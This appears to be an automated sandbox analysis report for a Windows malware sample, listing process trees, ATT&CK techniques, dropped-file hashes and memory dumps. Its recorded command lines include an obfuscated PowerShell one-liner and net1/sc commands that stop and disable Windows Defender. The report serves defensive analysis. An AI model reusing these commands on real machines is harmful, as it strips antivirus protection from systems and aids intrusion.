"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
5⤵
PID:4948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:1
5⤵
PID:1884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
5⤵
PID:3376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4224 /prefetch:8
5⤵
PID:3420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
5⤵
PID:4908

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
5⤵
PID:3308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
5⤵
PID:4576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
5⤵
PID:3900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
5⤵
PID:880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6488 /prefetch:8
5⤵
PID:3612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
5⤵
PID:3836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
5⤵
PID:3700

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6332 /prefetch:8
5⤵
PID:4320

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
5⤵
- Drops file in Program Files directory
PID:3424

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff789ea5460,0x7ff789ea5470,0x7ff789ea5480
6⤵
PID:432

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,10049205917950384665,2435861330879364230,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6332 /prefetch:8
5⤵
PID:3504

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:2452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4144

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
3⤵
- Launches sc.exe
PID:2492

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
3⤵
PID:2268

C:\Windows\SysWOW64\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2896

C:\Windows\SysWOW64\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
3⤵
PID:4116

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
3⤵
- Launches sc.exe
PID:3496

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1788

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
6195a91754effb4df74dbc72cdf4f7a6

SHA1
aba262f5726c6d77659fe0d3195e36a85046b427

SHA256
3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5

SHA512
ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tmp.exe.log
Filesize
1KB

MD5
69d71014fdb9e6dcd1758f2c46e07d17

SHA1
5d2622a9855dc131cfe3683e791888dd8aa8cbc9

SHA256
1a8d4efe9e6901bb174a9c665004ac353c2fef126fdd3e08ddffacfe262fa6b4

SHA512
217ef49ac56d9b5c26ebd05731e18f8b9e920a1bfe8f278e2fb1cfce0c0a476a99cae69f0859c1f19926dcb9c23600c71a93f6fa69d2f0bba6bcd21dfc385df2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
b79603331e3c32ccb3e9dfce277be725

SHA1
e7d474b98ee736a84bd684ee06a5cadcf6926dab

SHA256
5629df3d2f606090d4df6589d04699b69b44c8c20bc6b5ce3cf2623f2c2927cd

SHA512
d781a387d26b689d542bfcef41adf713f9e6dc0c8f8739a6adf38296279787fab451d691b23ebfbf2c110b4cdce461cea19db95e8650b1ffca9387e65d736e77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
13KB

MD5
f56ff23fb6e5f3daa58b25a4bb99fd87

SHA1
65b40be864e05524b73cb8a54b30aba247c01558

SHA256
e386a6e10a56860fd4b5fddf704c48bbc1a7283483bfce4cf2ba5e848599fca2

SHA512
2b97888722b5e7348c2213035139e5b4a8288e1e8eb9118a0ae12d867f87bc3ea2a4360d64e612eb0cf1ec061a67a13f3e21170e89cab8346ee08a2d47744ee8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
20KB

MD5
8f655efb87f34228b20775ae5664bf3d

SHA1
271512c2aed7f92fefba9c60c85ce615dcb60381

SHA256
b8def4811af1c75506acb8f05b799dee19439b92cc893c472681b21f6080e472

SHA512
aed627544acca58f077feba09b60c629f8c0e01aa7ed47ac8670f1ed6e3e72ae13d1414456c773fe3a0f796097d1536d649cf31100701595d9a6b8d998937e94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
20KB

MD5
6cb7a13a9c7a4055a664cd65e6bbaa2b

SHA1
bbaacbfb9231d465373f5586a3f0e74c8f67a4bd

SHA256
fa85f692c28a15ff7b95401c6e151a7dcada866602daf9059133f47f4eff264d

SHA512
3b90e8f25e203483b551bae96a81ead6a92f6b897e8ff47c8c1c833234190f92d8ccf5649950d46dfdffe258391d2efbc47c44080999374af7a982695f73addd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
14KB

MD5
3efd5e0637b76decb79ca5127edda79d

SHA1
3fd37a1f622bc10f3fb9abbd4f1aa968e4f85e07

SHA256
efcf85f2492011732e9ca55d28c3a995ed4e684de0bb19805fe7bbce148c0f63

SHA512
bf5c6ea10081e1918604277f29396295d98496c82bf21c2a1f1caf4c1581229d4ff787341601729b340a38bafa969c6beee35a02be06ed2da74917503e3404b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
477031a32089e6d066092d640b526add

SHA1
5041602c7c71b4c6e40928039dcc07b6b32a67f2

SHA256
0ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef

SHA512
01388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\F433.tmp\F434.tmp\F435.bat
Filesize
359B

MD5
c8a31c0b7599a9a2bd7c4500f27ac39e

SHA1
ed3ef80304778e80c1fad8247ed13a075083ef95

SHA256
8f0202e6ceb1e467066aa618ec0f69d859dbb7b3494789472fa5677ba7e926f1

SHA512
5dcabd9404669760488f3e58e85f1c7ca94848001c35175c789f4a2d780e2408db1a9051028072e47a6aaa59aa3e01a0a2388dbc7bf48ddc6c3d8b913cac1dbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updeter.exe
Filesize
120KB

MD5
b677cebc577f2285a16340a73f3e4d39

SHA1
40633e22558a6c728f228515f3097359dbc0458d

SHA256
6d746c5c7f76ca351c64535c2c65fa61593174d726586b339924f25546ac9544

SHA512
a1d2eb1132feb999f463f269f824167618f41d6e5cd567952f4267fbd2f99cdb22884f2d6bad74279a0e70a96b6fd3d9092c49de2af2acc5212892b450576b68

Download Submit
C:\Users\Admin\AppData\Local\Temp\Updeter.exe
Filesize
120KB

MD5
b677cebc577f2285a16340a73f3e4d39

SHA1
40633e22558a6c728f228515f3097359dbc0458d

SHA256
6d746c5c7f76ca351c64535c2c65fa61593174d726586b339924f25546ac9544

SHA512
a1d2eb1132feb999f463f269f824167618f41d6e5cd567952f4267fbd2f99cdb22884f2d6bad74279a0e70a96b6fd3d9092c49de2af2acc5212892b450576b68

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
Filesize
9.7MB

MD5
0974f41ccfe913ecca0e02b69e2a48e2

SHA1
b96e82a039a2024a8c352b6332a582593628bfba

SHA256
7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

SHA512
60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ynraflilhuhdhncsolreloader.exe
Filesize
9.7MB

MD5
0974f41ccfe913ecca0e02b69e2a48e2

SHA1
b96e82a039a2024a8c352b6332a582593628bfba

SHA256
7186284537f1f025d1f2e92d6f7b40b0a2de4ecc8a9c5ee96ff90001c38e6a8b

SHA512
60bcd8102e535b0d56ef170609ec6f3c5fcf36ab09e4fcfbf82fe92e77124bc6ee19dae7963b1078424d65010b43a741615ba0dbdce582d6402f8adf97303c8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\updeter.vbs
Filesize
112KB

MD5
8b50289dfca4b0f572536e3ff6b51b96

SHA1
8fac95861b2803dcae74709b08361c4e89e8ae86

SHA256
0b0c649fca400195a96031b16acc9b002d9556520c7e61f689967fd46eb058c8

SHA512
da5f11ebad71aaa8389f3c250ec06a54ff29b869bb738d6c61eaa7032b359bcfebfdbaa807b886aa02f8d15745f02b1162ef7774457a4911b7b9eb1a20f81acc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\54E9732B1B5AEFCCAFDD000CDDF1BA6CA30611FC
Filesize
984B

MD5
000847faf6c055c621ae96fcd21bf789

SHA1
f95f9edbb051330f4167d0397cce25d5c71fb89c

SHA256
eb0bbd2234aa7742359804dae77836425d2a08cd4657eab4ba96958f0fa91569

SHA512
bf3adca5245275b2bdf69649b824c2d51ded7581c0aa6b01b74066d36b76fb4d205ea9bfe917e481a46c3ea90045398d4da0a52172218f33eb717328b08f89b3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\54E9732B1B5AEFCCAFDD000CDDF1BA6CA30611FC
Filesize
1012B

MD5
eea7de6aea5113bc81fb20cc61c02309

SHA1
2d3638a1da4ee0810c4f15d7b94b12bf0ac75d01

SHA256
83c35364527a88c28c6d04c03cfc5ce31b48be048632cc70f16bc9fa7b6a75e6

SHA512
5e4f1521d9240767d8131948740b75c674e33788b4d7e3e81a04c0d1b1e1ad0250c0daf6f9e874905fb2c72fac02330f0bc564821bcef707e347be883a8d8a4f

Download Submit
C:\Users\Admin\AppData\Roaming\Updeter.exe
Filesize
6KB

MD5
d450f4523f607f01a50b039c83a60422

SHA1
7532dc7f0a86fd1a57d8b766d5673297c649fc68

SHA256
0f4929da9001eab23942eab268ece5da252c8b654273cc6ddaad9f87dcfbb1fa

SHA512
45a88e4adf74d0736004052b30fa8b0445703c7772f8963442179d392f2823e95997d4f5e2237ffa2f655aff784199f33e29ee4156fe199a6dbd3050f6524bf6

Download Submit
C:\Users\Admin\AppData\Roaming\rr.ps1
Filesize
3.1MB

MD5
85ba5955d189df04134dafef32564b86

SHA1
9f063d1b3539855140db17c41f633ccc3c125d10

SHA256
67663d1259adba451b85bddbf5516b51ffc4229e0052e3a83d4e16f06e0feb94

SHA512
6f425f77076d3bbeab945ce3dac446b3da303336754d6c0fbe8dce80dc6d7b61b855ad179f5d6736323193c3108528f4aa042320b38032376bc80ddfbd40459d

Download Submit
\??\pipe\LOCAL\crashpad_1616_FDMRMGQTKFWATKTH
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/432-366-0x0000000000000000-mapping.dmp

Download
memory/880-340-0x0000000000000000-mapping.dmp

Download
memory/1036-222-0x0000000000000000-mapping.dmp

Download
memory/1616-266-0x0000000000000000-mapping.dmp

Download
memory/1884-287-0x0000000000000000-mapping.dmp

Download
memory/1968-332-0x0000000000000000-mapping.dmp

Download
memory/2060-224-0x0000000000000000-mapping.dmp

Download
memory/2200-220-0x0000000000000000-mapping.dmp

Download
memory/2268-348-0x0000000000000000-mapping.dmp

Download
memory/2316-400-0x0000000000000000-mapping.dmp

Download
memory/2388-239-0x0000000000000000-mapping.dmp

Download
memory/2428-314-0x0000000007530000-0x00000000075C6000-memory.dmp

Filesize
600KB

Download
memory/2428-297-0x0000000000000000-mapping.dmp

Download
memory/2428-315-0x00000000074E0000-0x0000000007502000-memory.dmp

Filesize
136KB

Download
memory/2492-345-0x0000000000000000-mapping.dmp

Download
memory/2736-223-0x0000000000000000-mapping.dmp

Download
memory/2784-277-0x0000000000000000-mapping.dmp

Download
memory/2868-393-0x0000000000000000-mapping.dmp

Download
memory/2868-407-0x0000000000000000-mapping.dmp

Download
memory/2868-394-0x000001EFB2BA0000-0x000001EFB2BC2000-memory.dmp

Filesize
136KB

Download
memory/2868-399-0x00007FFB59BE0000-0x00007FFB5A6A1000-memory.dmp

Filesize
10.8MB

Download
memory/2896-350-0x0000000000000000-mapping.dmp

Download
memory/2920-381-0x0000000000000000-mapping.dmp

Download
memory/3076-241-0x0000000000000000-mapping.dmp

Download
memory/3076-317-0x0000000000000000-mapping.dmp

Download
memory/3076-252-0x00000000073A0000-0x000000000743C000-memory.dmp

Filesize
624KB

Download
memory/3284-391-0x0000000000000000-mapping.dmp

Download
memory/3308-323-0x0000000000000000-mapping.dmp

Download
memory/3376-289-0x0000000000000000-mapping.dmp

Download
memory/3420-295-0x0000000000000000-mapping.dmp

Download
memory/3424-365-0x0000000000000000-mapping.dmp

Download
memory/3496-356-0x0000000000000000-mapping.dmp

Download
memory/3504-372-0x0000000000000000-mapping.dmp

Download
memory/3536-388-0x0000000000000000-mapping.dmp

Download
memory/3612-347-0x0000000000000000-mapping.dmp

Download
memory/3620-240-0x0000000000000000-mapping.dmp

Download
memory/3700-354-0x0000000000000000-mapping.dmp

Download
memory/3836-352-0x0000000000000000-mapping.dmp

Download
memory/3900-327-0x0000000000000000-mapping.dmp

Download
memory/3980-182-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-282-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-225-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-228-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-231-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-232-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-235-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-236-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-216-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-213-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-210-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-242-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-207-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-206-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-245-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-203-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-202-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-408-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-255-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-402-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-260-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-262-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-199-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-198-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-390-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-271-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-272-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-195-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-144-0x0000000000000000-mapping.dmp

Download
memory/3980-192-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-383-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-161-0x00007FFB7C5B0000-0x00007FFB7C66E000-memory.dmp

Filesize
760KB

Download
memory/3980-191-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-190-0x0000000140000000-0x00000001412A5000-memory.dmp

Filesize
18.6MB

Download
memory/3980-290-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-187-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-296-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-186-0x0000000140000000-0x00000001412A5000-memory.dmp

Filesize
18.6MB

Download
memory/3980-301-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-183-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-306-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-162-0x00007FFB7A7F0000-0x00007FFB7A991000-memory.dmp

Filesize
1.6MB

Download
memory/3980-376-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-311-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-179-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-176-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-371-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-217-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-154-0x0000000140000000-0x00000001412A5000-memory.dmp

Filesize
18.6MB

Download
memory/3980-155-0x0000000140000000-0x00000001412A5000-memory.dmp

Filesize
18.6MB

Download
memory/3980-364-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-173-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-328-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-170-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-360-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-334-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-159-0x0000000140000000-0x00000001412A5000-memory.dmp

Filesize
18.6MB

Download
memory/3980-160-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-341-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-167-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-164-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-163-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3980-349-0x00007FFB7C710000-0x00007FFB7C905000-memory.dmp

Filesize
2.0MB

Download
memory/3984-380-0x0000000000000000-mapping.dmp

Download
memory/4108-153-0x0000000005160000-0x000000000526A000-memory.dmp

Filesize
1.0MB

Download
memory/4108-151-0x0000000002900000-0x0000000002912000-memory.dmp

Filesize
72KB

Download
memory/4108-169-0x0000000006B40000-0x000000000706C000-memory.dmp

Filesize
5.2MB

Download
memory/4108-168-0x0000000006440000-0x0000000006602000-memory.dmp

Filesize
1.8MB

Download
memory/4108-174-0x0000000006970000-0x00000000069E6000-memory.dmp

Filesize
472KB

Download
memory/4108-147-0x0000000000000000-mapping.dmp

Download
memory/4108-175-0x0000000006A10000-0x0000000006A2E000-memory.dmp

Filesize
120KB

Download
memory/4108-148-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/4108-152-0x0000000004EC0000-0x0000000004EFC000-memory.dmp

Filesize
240KB

Download
memory/4108-150-0x00000000055D0000-0x0000000005BE8000-memory.dmp

Filesize
6.1MB

Download
memory/4116-355-0x0000000000000000-mapping.dmp

Download
memory/4144-333-0x0000000000000000-mapping.dmp

Download
memory/4220-138-0x0000000005310000-0x0000000005938000-memory.dmp

Filesize
6.2MB

Download
memory/4220-136-0x0000000000000000-mapping.dmp

Download
memory/4220-137-0x0000000004C10000-0x0000000004C46000-memory.dmp

Filesize
216KB

Download
memory/4220-139-0x0000000005A90000-0x0000000005AF6000-memory.dmp

Filesize
408KB

Download
memory/4220-140-0x0000000005B70000-0x0000000005BD6000-memory.dmp

Filesize
408KB

Download
